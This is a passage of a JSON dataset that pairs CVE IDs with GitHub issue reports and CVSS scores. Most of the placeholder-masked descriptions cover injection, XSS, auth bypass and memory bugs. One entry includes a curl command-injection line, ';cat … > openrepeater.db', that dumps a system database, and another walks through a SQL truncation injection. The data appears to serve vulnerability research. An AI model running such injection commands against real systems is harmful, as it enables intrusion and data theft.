  42569. "Issue_Created_At": "2019-03-27T12:46:27Z",
  42570. "description": "Password bypass vulnerability. We can authorize as any user. For that we can use a jwt token with an empty shared_secret. It happens because URLTAG here we do not check that APITAG is not an empty string. In the Authentication and authorization in APITAG document we do not mention anything about the APITAG variable. Also it seems like we also do not check the exp state of the token. And once generated, a token is valid forever.",
  42571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42572. "severity": "CRITICAL",
  42573. "baseScore": 9.8,
  42574. "impactScore": 5.9,
  42575. "exploitabilityScore": 3.9
  42576. },
  42577. {
  42578. "CVE_ID": "CVE-2019-25010",
  42579. "Issue_Url_old": "https://github.com/rust-lang-nursery/failure/issues/336",
  42580. "Issue_Url_new": "https://github.com/rust-lang-deprecated/failure/issues/336",
  42581. "Repo_new": "rust-lang-deprecated/failure",
  42582. "Issue_Created_At": "2019-11-13T21:37:22Z",
  42583. "description": "Memory safety violation by abusing APITAG . I noticed that it is possible to cause type confusion in downcast by manually implementing APITAG . URLTAG Although the name of the function clearly shows that it is a private API, I believe a safe Rust program should not violate the memory safety guaranteed by the Rust type system.",
  42584. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42585. "severity": "CRITICAL",
  42586. "baseScore": 9.8,
  42587. "impactScore": 5.9,
  42588. "exploitabilityScore": 3.9
  42589. },
  42590. {
  42591. "CVE_ID": "CVE-2019-25011",
  42592. "Issue_Url_old": "https://github.com/netbox-community/netbox/issues/3471",
  42593. "Issue_Url_new": "https://github.com/netbox-community/netbox/issues/3471",
  42594. "Repo_new": "netbox-community/netbox",
  42595. "Issue_Created_At": "2019-08-31T09:47:44Z",
  42596. "description": "FILETAG a cve will be requested URLTAG",
  42597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  42598. "severity": "MEDIUM",
  42599. "baseScore": 5.4,
  42600. "impactScore": 2.7,
  42601. "exploitabilityScore": 2.3
  42602. },
  42603. {
  42604. "CVE_ID": "CVE-2019-25016",
  42605. "Issue_Url_old": "https://github.com/Duncaen/OpenDoas/issues/45",
  42606. "Issue_Url_new": "https://github.com/duncaen/opendoas/issues/45",
  42607. "Repo_new": "duncaen/opendoas",
  42608. "Issue_Created_At": "2021-01-28T16:09:13Z",
  42609. "description": "APITAG keeps current PATH variable . APITAG version NUMBERTAG System: Gentoo, Debian NUMBERTAG APITAG content: APITAG _mad doas_ says that variable PATH is set to value appropriate for the target user, but current value preserves: CODETAG expected value: CODETAG",
  42610. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42611. "severity": "HIGH",
  42612. "baseScore": 8.8,
  42613. "impactScore": 5.9,
  42614. "exploitabilityScore": 2.8
  42615. },
  42616. {
  42617. "CVE_ID": "CVE-2019-25024",
  42618. "Issue_Url_old": "https://github.com/OpenRepeater/openrepeater/issues/66",
  42619. "Issue_Url_new": "https://github.com/openrepeater/openrepeater/issues/66",
  42620. "Repo_new": "openrepeater/openrepeater",
  42621. "Issue_Created_At": "2019-03-06T21:08:00Z",
  42622. "description": "Unauthenticated Command Injection Flaw. An unauthenticated malicious actor can execute arbitrary system commands via APITAG This has a critical impact in the security of the system, for example Download system database: > $ curl PATHTAG data \"post_service=;cat PATHTAG > openrepeater.db The only limit is imagination. Regards!",
  42623. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42624. "severity": "CRITICAL",
  42625. "baseScore": 9.8,
  42626. "impactScore": 5.9,
  42627. "exploitabilityScore": 3.9
  42628. },
  42629. {
  42630. "CVE_ID": "CVE-2019-25043",
  42631. "Issue_Url_old": "https://github.com/SpiderLabs/ModSecurity/issues/2566",
  42632. "Issue_Url_new": "https://github.com/spiderlabs/modsecurity/issues/2566",
  42633. "Repo_new": "spiderlabs/modsecurity",
  42634. "Issue_Created_At": "2021-05-06T03:01:20Z",
  42635. "description": "Certain HTTP requests cause APITAG to throw a \"string out of index\" error. Describe the bug The connection will be closed due to a \"string index out of range\" error under certain requests. Logs and dumps CODETAG To Reproduce APITAG Server: APITAG NUMBERTAG on Ngin NUMBERTAG official base image",
  42636. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  42637. "severity": "MEDIUM",
  42638. "baseScore": 5.3,
  42639. "impactScore": 1.4,
  42640. "exploitabilityScore": 3.9
  42641. },
  42642. {
  42643. "CVE_ID": "CVE-2019-25047",
  42644. "Issue_Url_old": "https://github.com/greenbone/gsa/issues/1601",
  42645. "Issue_Url_new": "https://github.com/greenbone/gsa/issues/1601",
  42646. "Repo_new": "greenbone/gsa",
  42647. "Issue_Created_At": "2019-09-02T13:48:06Z",
  42648. "description": "Reflected XSS in GSA possible.. Expected behavior Escaping part of URL and redirecting to /login page. Actual behavior When clicking on a specially crafted URL, APITAG Code gets executed. Steps to reproduce FILETAG GVM versions gsa NUMBERTAG gvm NUMBERTAG openvas scanner NUMBERTAG gvm libs: Environment Operating system: found with nikto NUMBERTAG erified with Firefox Quantum NUMBERTAG esr NUMBERTAG Bit) Installation method / source: (packages, source installation) Logfiles APITAG APITAG",
  42649. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42650. "severity": "MEDIUM",
  42651. "baseScore": 6.1,
  42652. "impactScore": 2.7,
  42653. "exploitabilityScore": 2.8
  42654. },
  42655. {
  42656. "CVE_ID": "CVE-2019-25056",
  42657. "Issue_Url_old": "https://github.com/bromite/bromite/issues/2",
  42658. "Issue_Url_new": "https://github.com/bromite/bromite/issues/2",
  42659. "Repo_new": "bromite/bromite",
  42660. "Issue_Created_At": "2017-10-11T14:19:01Z",
  42661. "description": "Support download of filters from adblock servers. This issue composes of multiple parts: a new tab to manage the adblocking feature logic to download the adblock filters and store them logic to parse the adblock filters The project we could look at are APITAG and APITAG origin.",
  42662. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  42663. "severity": "MEDIUM",
  42664. "baseScore": 5.3,
  42665. "impactScore": 1.4,
  42666. "exploitabilityScore": 3.9
  42667. },
  42668. {
  42669. "CVE_ID": "CVE-2019-25058",
  42670. "Issue_Url_old": "https://github.com/USBGuard/usbguard/issues/273",
  42671. "Issue_Url_new": "https://github.com/usbguard/usbguard/issues/273",
  42672. "Repo_new": "usbguard/usbguard",
  42673. "Issue_Created_At": "2019-02-07T12:11:36Z",
  42674. "description": "No default ACL on some dbus methods. Some of the methods exposed via dbus are not covered by the current default policy URLTAG . This includes the APITAG and APITAG methods. On a default debian install, as unprivileged user: ERRORTAG This can be fixed by adding these to the current policy configuration. However, having NUMBERTAG buses and NUMBERTAG ACLs makes the administration of any deployment tedious. There is always a risk of future methods to be exposed. Ideally, dbus should be the only bus exposed and the libqb bus dropped.",
  42675. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42676. "severity": "HIGH",
  42677. "baseScore": 7.8,
  42678. "impactScore": 5.9,
  42679. "exploitabilityScore": 1.8
  42680. },
  42681. {
  42682. "CVE_ID": "CVE-2019-25058",
  42683. "Issue_Url_old": "https://github.com/USBGuard/usbguard/issues/403",
  42684. "Issue_Url_new": "https://github.com/usbguard/usbguard/issues/403",
  42685. "Repo_new": "usbguard/usbguard",
  42686. "Issue_Created_At": "2020-08-07T17:54:42Z",
  42687. "description": "Polkit policy is not valid with newest versions of Polkit. With new versions of Polkit, the value APITAG is no more valid for the tags APITAG , APITAG and APITAG . The [usbguard policy config]( URLTAG is not parsed anymore by new versions of Polkit, and the defined actions are unavailable. proposed solutions APITAG : allowed executing an action after authenticating, and the redo the action without auth for all the rest of the session. It is now unavailable APITAG : the authorization is kept for a brief period (e.g. five minutes). It is most probably not retro compatible. (I found no reference online of APITAG on pages mentioning APITAG ) APITAG : You have to re authenticate at each call of the action. This argument is retro compatible. Should we replace occurrences of APITAG with APITAG or APITAG ?",
  42688. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42689. "severity": "HIGH",
  42690. "baseScore": 7.8,
  42691. "impactScore": 5.9,
  42692. "exploitabilityScore": 1.8
  42693. },
  42694. {
  42695. "CVE_ID": "CVE-2019-25070",
  42696. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/683",
  42697. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/683",
  42698. "Repo_new": "wolfcms/wolfcms",
  42699. "Issue_Created_At": "2019-04-01T06:25:24Z",
  42700. "description": "Cross Site Scripting | APITAG NUMBERTAG User Add. Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. Impacted URL is URLTAG Steps to reproduce NUMBERTAG Browse to URLTAG to add an user NUMBERTAG Insert payload (malicious APITAG APITAG in Name text box and an invalid input in Username text box. APITAG NUMBERTAG Application is displaying error APITAG and returning the previous APITAG payload in response and hence executing it. APITAG Best Regards, URLTAG varchashva [at] gmail [dot] com",
  42701. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42702. "severity": "MEDIUM",
  42703. "baseScore": 6.1,
  42704. "impactScore": 2.7,
  42705. "exploitabilityScore": 2.8
  42706. },
  42707. {
  42708. "CVE_ID": "CVE-2019-3494",
  42709. "Issue_Url_old": "https://github.com/Paroxyste/Simply-Blog/issues/1",
  42710. "Issue_Url_new": "https://github.com/paroxyste/simply-blog/issues/1",
  42711. "Repo_new": "Paroxyste/Simply-Blog",
  42712. "Issue_Created_At": "2019-01-01T09:12:59Z",
  42713. "description": "There might be a SQL injection issue in FILETAG . issue starts at line NUMBERTAG to line NUMBERTAG CODETAG We can see intuitively that database queries are not filtered\uff0cso attacker can inject payload into Query directly SUGGEST: i think you can add character filtering to check user input before execute the query",
  42714. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42715. "severity": "HIGH",
  42716. "baseScore": 7.5,
  42717. "impactScore": 3.6,
  42718. "exploitabilityScore": 3.9
  42719. },
  42720. {
  42721. "CVE_ID": "CVE-2019-3500",
  42722. "Issue_Url_old": "https://github.com/aria2/aria2/issues/1329",
  42723. "Issue_Url_new": "https://github.com/aria2/aria2/issues/1329",
  42724. "Repo_new": "aria2/aria2",
  42725. "Issue_Created_At": "2019-01-01T12:52:33Z",
  42726. "description": "Metadata and potential password leaks via log=. Hi Team, I am using aria2 version NUMBERTAG on NUMBERTAG generic NUMBERTAG Ubuntu NUMBERTAG It was observed that URL's which gets downloaded via APITAG attribute stored sensitive information NUMBERTAG In combination with HTTP authentication a username and password can be part of the URL. APITAG In such case the log file contains password as well, sometimes URL's may contain secret tokens, e.g. private file shares on a file hosting service. In general storing metadata at unexpected places should be avoided NUMBERTAG However, if the above steps are repeated using the below URL the log file does not contains password. APITAG Request team to have a look and validate.",
  42727. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42728. "severity": "HIGH",
  42729. "baseScore": 7.8,
  42730. "impactScore": 5.9,
  42731. "exploitabilityScore": 1.8
  42732. },
  42733. {
  42734. "CVE_ID": "CVE-2019-3501",
  42735. "Issue_Url_old": "https://github.com/Sama34/OUGC-Awards/issues/29",
  42736. "Issue_Url_new": "https://github.com/sama34/ougc-awards/issues/29",
  42737. "Repo_new": "sama34/ougc-awards",
  42738. "Issue_Created_At": "2019-01-02T05:47:24Z",
  42739. "description": "XSS in reason field.. Describe the bug Apparently custom reasons are not sanitized on output. To Reproduce Steps to reproduce the behavior NUMBERTAG Have a mod account level or higher NUMBERTAG Go to Manage Awards in APITAG NUMBERTAG Give an award to a user and input payload for reason. APITAG NUMBERTAG Payload executes when viewing award on FILETAG and user profiles. Expected behavior Such code shouldn't be executed.",
  42740. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42741. "severity": "MEDIUM",
  42742. "baseScore": 4.8,
  42743. "impactScore": 2.7,
  42744. "exploitabilityScore": 1.7
  42745. },
  42746. {
  42747. "CVE_ID": "CVE-2019-3572",
  42748. "Issue_Url_old": "https://github.com/libming/libming/issues/169",
  42749. "Issue_Url_new": "https://github.com/libming/libming/issues/169",
  42750. "Repo_new": "libming/libming",
  42751. "Issue_Created_At": "2018-12-28T10:35:44Z",
  42752. "description": "a heap buffer overflow problem in function APITAG in file PATHTAG I found a a heap buffer overflow problem in function APITAG in file PATHTAG FILETAG PATHTAG verbose in2.dbl FILETAG image data RGB outsize NUMBERTAG size NUMBERTAG unpacked data size t NUMBERTAG byte channel count NUMBERTAG Segmentation fault (core dumped) ERRORTAG",
  42753. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42754. "severity": "MEDIUM",
  42755. "baseScore": 6.5,
  42756. "impactScore": 3.6,
  42757. "exploitabilityScore": 2.8
  42758. },
  42759. {
  42760. "CVE_ID": "CVE-2019-3573",
  42761. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/83",
  42762. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/83",
  42763. "Repo_new": "saitoha/libsixel",
  42764. "Issue_Created_At": "2019-01-02T08:08:21Z",
  42765. "description": "two bugs in img2sixel and sixel2png. APITAG CODETAG APITAG ERRORTAG",
  42766. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42767. "severity": "MEDIUM",
  42768. "baseScore": 5.5,
  42769. "impactScore": 3.6,
  42770. "exploitabilityScore": 1.8
  42771. },
  42772. {
  42773. "CVE_ID": "CVE-2019-3575",
  42774. "Issue_Url_old": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20",
  42775. "Issue_Url_new": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20",
  42776. "Repo_new": "schettino72/sqla_yaml_fixtures",
  42777. "Issue_Created_At": "2019-01-02T15:02:16Z",
  42778. "description": "APITAG method is vulnerable. import sqla_yaml_fixtures test_str PATHTAG [\"dir\"]' APITAG",
  42779. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42780. "severity": "HIGH",
  42781. "baseScore": 7.8,
  42782. "impactScore": 5.9,
  42783. "exploitabilityScore": 1.8
  42784. },
  42785. {
  42786. "CVE_ID": "CVE-2019-3577",
  42787. "Issue_Url_old": "https://github.com/caokang/waimai/issues/9",
  42788. "Issue_Url_new": "https://github.com/caokang/waimai/issues/9",
  42789. "Repo_new": "caokang/waimai",
  42790. "Issue_Created_At": "2019-01-02T16:02:56Z",
  42791. "description": "There is a SQL Injection vulnerability. There is a blind sql injection. APITAG is based on APITAG vulnerable code in PATHTAG ERRORTAG exp to get admin password here: CODETAG",
  42792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42793. "severity": "CRITICAL",
  42794. "baseScore": 9.8,
  42795. "impactScore": 5.9,
  42796. "exploitabilityScore": 3.9
  42797. },
  42798. {
  42799. "CVE_ID": "CVE-2019-3580",
  42800. "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1927",
  42801. "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1927",
  42802. "Repo_new": "openrefine/openrefine",
  42803. "Issue_Created_At": "2019-01-02T17:44:47Z",
  42804. "description": "Project import vulnerable to arbitrary file write. Describe the bug The import of a project is prone to a path traversal and thus an arbitrary file write. To Reproduce Steps to reproduce the behavior NUMBERTAG Download FILETAG NUMBERTAG APITAG , APITAG is created NUMBERTAG Go to APITAG Import Projects NUMBERTAG Choose APITAG NUMBERTAG Import file NUMBERTAG APITAG should show the content of the file. Current Results The first NUMBERTAG bytes are from the file APITAG are chosen as path, not the filename itself. An error is also shown but is not related to the path traversal. Expected behavior Show an error, warn user, do not write file outside of the project folder. Video FILETAG Desktop (please complete the following information): Not important APITAG (please complete the following information): Demo with NUMBERTAG but should work with master Datasets Payload file FILETAG Additional context Please also update dependencies. The ant library is out of date and sloppy (compared to other) handling (tar) archive header. If you have questions, you can reach me at \"niko at sign shiftleft.io\" or URLTAG",
  42805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42806. "severity": "HIGH",
  42807. "baseScore": 7.5,
  42808. "impactScore": 3.6,
  42809. "exploitabilityScore": 3.9
  42810. },
  42811. {
  42812. "CVE_ID": "CVE-2019-3817",
  42813. "Issue_Url_old": "https://github.com/rpm-software-management/libcomps/issues/41",
  42814. "Issue_Url_new": "https://github.com/rpm-software-management/libcomps/issues/41",
  42815. "Repo_new": "rpm-software-management/libcomps",
  42816. "Issue_Created_At": "2019-01-21T16:12:03Z",
  42817. "description": "use after free in comps_objmrtree_unite function. pair is freed in URLTAG but it is accessed again at the next iteration at URLTAG accessing memory that was just recently freed. Valgrind output: ERRORTAG",
  42818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42819. "severity": "HIGH",
  42820. "baseScore": 8.8,
  42821. "impactScore": 5.9,
  42822. "exploitabilityScore": 2.8
  42823. },
  42824. {
  42825. "CVE_ID": "CVE-2019-3832",
  42826. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/456",
  42827. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/456",
  42828. "Repo_new": "libsndfile/libsndfile",
  42829. "Issue_Created_At": "2019-02-07T09:17:20Z",
  42830. "description": "Incomplete fix for CVETAG . Hi, I think the fix for CVETAG in URLTAG is not complete and it is still possible to trigger the same flaw just by adjusting the APITAG a bit. In APITAG : APITAG Loops is defined as an array of NUMBERTAG elements, so reducing APITAG to a NUMBERTAG bit number does not really solve the out of bound read issue. The value should be checked and wrapped to NUMBERTAG not NUMBERTAG bits) or the process terminated immediately because the input is malformed. How to reproduce ERRORTAG FILETAG Extra If the issue is confirmed, I will request a new CVE for it as the old one may have been already fixed in some distributions, which would not get the real fix otherwise.",
  42831. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42832. "severity": "MEDIUM",
  42833. "baseScore": 5.5,
  42834. "impactScore": 3.6,
  42835. "exploitabilityScore": 1.8
  42836. },
  42837. {
  42838. "CVE_ID": "CVE-2019-3841",
  42839. "Issue_Url_old": "https://github.com/kubevirt/containerized-data-importer/issues/678",
  42840. "Issue_Url_new": "https://github.com/kubevirt/containerized-data-importer/issues/678",
  42841. "Repo_new": "kubevirt/containerized-data-importer",
  42842. "Issue_Created_At": "2019-02-26T21:32:36Z",
  42843. "description": "Registry imports disable TLS. A flaw was identified in the Containerized Data Importer, a component used by Container Native Virtualization. In Containerized Data Importer versions from NUMBERTAG through NUMBERTAG the import from registry feature disabled TLS certificate verification when communicating with container registries. An attacker could use this flaw to impersonate a trusted container registry. All users should upgrade to CDI version NUMBERTAG or later. Affected Components CDI importer container image (kubevirt/cdi importer) Affected Versions CDI NUMBERTAG CDI NUMBERTAG Users of Red Hat Container Native Virtualization are unaffected. Vulnerability Impact Unless explicitly disabled, communication with container registries is expected to be secured with SSL and TLS. In CDI versions affected by this flaw, TLS certificate verification is disabled for all connections to container registries. As a result, content may be imported into a PVC from an inauthentic server. Mitigations The vulnerability can only be triggered by an authenticated kubernetes user who is authorized to create PVCs. To mitigate, do not create PVCs with the APITAG \"registry\"\" annotation and do not create APITAG that use the \"registry\" source. Detection To identify if your CDI deployment is affected perform the following steps: Initiate an import from registry using either a APITAG or a PVC without requesting an insecure connection Locate the importer pod in the namespace where the PVC or APITAG was created Look for a message similar to the following in the logs: APITAG The presence of the parameter APITAG indicates a vulnerable CDI deployment",
  42844. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
  42845. "severity": "MEDIUM",
  42846. "baseScore": 6.8,
  42847. "impactScore": 5.2,
  42848. "exploitabilityScore": 1.6
  42849. },
  42850. {
  42851. "CVE_ID": "CVE-2019-5064",
  42852. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15857",
  42853. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15857",
  42854. "Repo_new": "opencv/opencv",
  42855. "Issue_Created_At": "2019-11-06T16:00:12Z",
  42856. "description": "Talos security advisory for Opencv (TALOS NUMBERTAG The Cisco Talos team found two security vulnerabilities affecting Opencv APITAG NUMBERTAG As this is a sensitive security issue, this message is to request a point of contact to report the detailed report. Email requests to admin at opencv.org were also sent.",
  42857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42858. "severity": "HIGH",
  42859. "baseScore": 8.8,
  42860. "impactScore": 5.9,
  42861. "exploitabilityScore": 2.8
  42862. },
  42863. {
  42864. "CVE_ID": "CVE-2019-5310",
  42865. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/6",
  42866. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/6",
  42867. "Repo_new": "doublefast/yunucms",
  42868. "Issue_Created_At": "2019-01-04T06:48:58Z",
  42869. "description": "Bug NUMBERTAG Stored Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG The judgment code of the basic settings page is: FILETAG Pass in such a packet here FILETAG See the FILETAG file to see that the site_title parameter has been changed. FILETAG The value in FILETAG was taken directly in FILETAG , resulting in a storage XSS vulnerability. FILETAG APITAG To Reproduce: FILETAG FILETAG FILETAG Fix: Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc.",
  42870. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42871. "severity": "MEDIUM",
  42872. "baseScore": 6.1,
  42873. "impactScore": 2.7,
  42874. "exploitabilityScore": 2.8
  42875. },
  42876. {
  42877. "CVE_ID": "CVE-2019-5311",
  42878. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/5",
  42879. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/5",
  42880. "Repo_new": "doublefast/yunucms",
  42881. "Issue_Created_At": "2019-01-04T03:42:16Z",
  42882. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG NUMBERTAG In the PATHTAG , No filtering to cw in the index( ) function: FILETAG FILETAG FILETAG APITAG To Reproduce: Open below URL in browser which supports flash. url: URLTAG FILETAG Fix: Filter the id parameter",
  42883. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42884. "severity": "MEDIUM",
  42885. "baseScore": 6.1,
  42886. "impactScore": 2.7,
  42887. "exploitabilityScore": 2.8
  42888. },
  42889. {
  42890. "CVE_ID": "CVE-2019-5312",
  42891. "Issue_Url_old": "https://github.com/Wechat-Group/WxJava/issues/903",
  42892. "Issue_Url_new": "https://github.com/wechat-group/wxjava/issues/903",
  42893. "Repo_new": "wechat-group/wxjava",
  42894. "Issue_Created_At": "2019-01-04T14:04:31Z",
  42895. "description": "XXE Vulnerability. Hello, i have tested the fix for the XXE vulnerability of the issue NUMBERTAG URLTAG . Unfortunately, the vulnerability is still present in version APITAG , see the image below. FILETAG Additional information on how to prevent such kind of issues can be found on URLTAG Thank you and best regards",
  42896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42897. "severity": "CRITICAL",
  42898. "baseScore": 9.8,
  42899. "impactScore": 5.9,
  42900. "exploitabilityScore": 3.9
  42901. },
  42902. {
  42903. "CVE_ID": "CVE-2019-5421",
  42904. "Issue_Url_old": "https://github.com/plataformatec/devise/issues/4981",
  42905. "Issue_Url_new": "https://github.com/heartcombo/devise/issues/4981",
  42906. "Repo_new": "heartcombo/devise",
  42907. "Issue_Created_At": "2018-11-27T16:02:36Z",
  42908. "description": "Small security issue with :lockable. Environment Ruby any Rails any running a multithreaded server (like puma) Devise NUMBERTAG Current behavior Some pentesters found an issue where our users did not lock (using :lockable), despite running many many attempts to brute force the password. To reproduce, try to login many times at exactly the same time NUMBERTAG attempts within NUMBERTAG milliseconds of each other will not increment the failed_attempts attribute on your user NUMBERTAG times on a busy or slow database. This is a test that describes the behaviour that I would reasonably expect: CODETAG This test will fail in devise NUMBERTAG Expected behavior The issue arises because we read and set failed_attempts in two steps, instead of in one transaction. Below is an excerpt of the method from APITAG , my comments added: ERRORTAG Our workaround we use is something along the lines of: CODETAG which passes the test above. This solution is postgres specific (and also assumes integer ids) so may not be suitable for devise, but the idea stands. Reading and writing from this attribute needs to happen on at least a row level transaction in the database.",
  42909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42910. "severity": "CRITICAL",
  42911. "baseScore": 9.8,
  42912. "impactScore": 5.9,
  42913. "exploitabilityScore": 3.9
  42914. },
  42915. {
  42916. "CVE_ID": "CVE-2019-5477",
  42917. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1915",
  42918. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1915",
  42919. "Repo_new": "sparklemotion/nokogiri",
  42920. "Issue_Created_At": "2019-07-20T19:40:01Z",
  42921. "description": "placeholder] embargoed security vulnerability. A security vulnerability has been reported via the APITAG Reporting Policy process URLTAG and this issue will be the public record for this vulnerability and the triage and mitigation process.",
  42922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42923. "severity": "CRITICAL",
  42924. "baseScore": 9.8,
  42925. "impactScore": 5.9,
  42926. "exploitabilityScore": 3.9
  42927. },
  42928. {
  42929. "CVE_ID": "CVE-2019-5720",
  42930. "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/38",
  42931. "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/38",
  42932. "Repo_new": "frontaccountingerp/fa",
  42933. "Issue_Created_At": "2019-01-07T11:10:06Z",
  42934. "description": "SQL Injection. > APITAG is my first time to chat with people in English. I don't speak much English. Frontaccounting is using function APITAG to escape value. But some variables do not use the function APITAG environment : docker mattrayner/lamp:latest NUMBERTAG Description PATHTAG If I set parameter $reference like \u2018XXXXXX\\\u2019. Single quotes can APITAG I can inject in parameter $type FILETAG APITAG FILETAG PATHTAG FILETAG APITAG FILETAG APITAG FILETAG So parameter $type can be controlled How about parameter $reference? FILETAG FILETAG APITAG FILETAG After that I found some insert statements of table grn_batch. PATHTAG FILETAG PATHTAG FILETAG purchasing/ FILETAG NUMBERTAG FILETAG FILETAG So parameter $reference can be controlled NUMBERTAG Bypass NUMBERTAG PHP switch ($type) The variable $type like NUMBERTAG in here is same as NUMBERTAG dasdsadasda. FILETAG FILETAG NUMBERTAG Mysql Converting a string into an integer has some problems in mysql. FILETAG NUMBERTAG dasdasdasd NUMBERTAG dasdasdasd' FILETAG String and integer can be added NUMBERTAG Mysql has SQL Truncation problem so that \u2018\\\u2019 can be truncated NUMBERTAG POC: Settings such as PATHTAG will report an error, but PATHTAG will not . I noticed that refererence is NUMBERTAG bytes, set the payload to NUMBERTAG bytes like PATHTAG is PATHTAG in the database. I am using FILETAG , not the po_receive_items.php found above. FILETAG CODETAG database: FILETAG FILETAG FILETAG CODETAG The final execution of the sql statement is like this\uff1a ERRORTAG",
  42935. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42936. "severity": "CRITICAL",
  42937. "baseScore": 9.8,
  42938. "impactScore": 5.9,
  42939. "exploitabilityScore": 3.9
  42940. },
  42941. {
  42942. "CVE_ID": "CVE-2019-5886",
  42943. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/1",
  42944. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/1",
  42945. "Repo_new": "gongfuxiang/shopxo",
  42946. "Issue_Created_At": "2019-01-04T08:31:44Z",
  42947. "description": "\u91cd\u88c5\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG PATHTAG FILETAG \u6784\u9020\u5982\u4e0bpost\u8bf7\u6c42 FILETAG APITAG FILETAG \u6700\u5173\u952e\u7684\u5730\u65b9\u662f\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6\u4e5f\u4fee\u6539\u4e86 FILETAG APITAG",
  42948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42949. "severity": "CRITICAL",
  42950. "baseScore": 9.8,
  42951. "impactScore": 5.9,
  42952. "exploitabilityScore": 3.9
  42953. },
  42954. {
  42955. "CVE_ID": "CVE-2019-5887",
  42956. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/2",
  42957. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/2",
  42958. "Repo_new": "gongfuxiang/shopxo",
  42959. "Issue_Created_At": "2019-01-04T09:55:55Z",
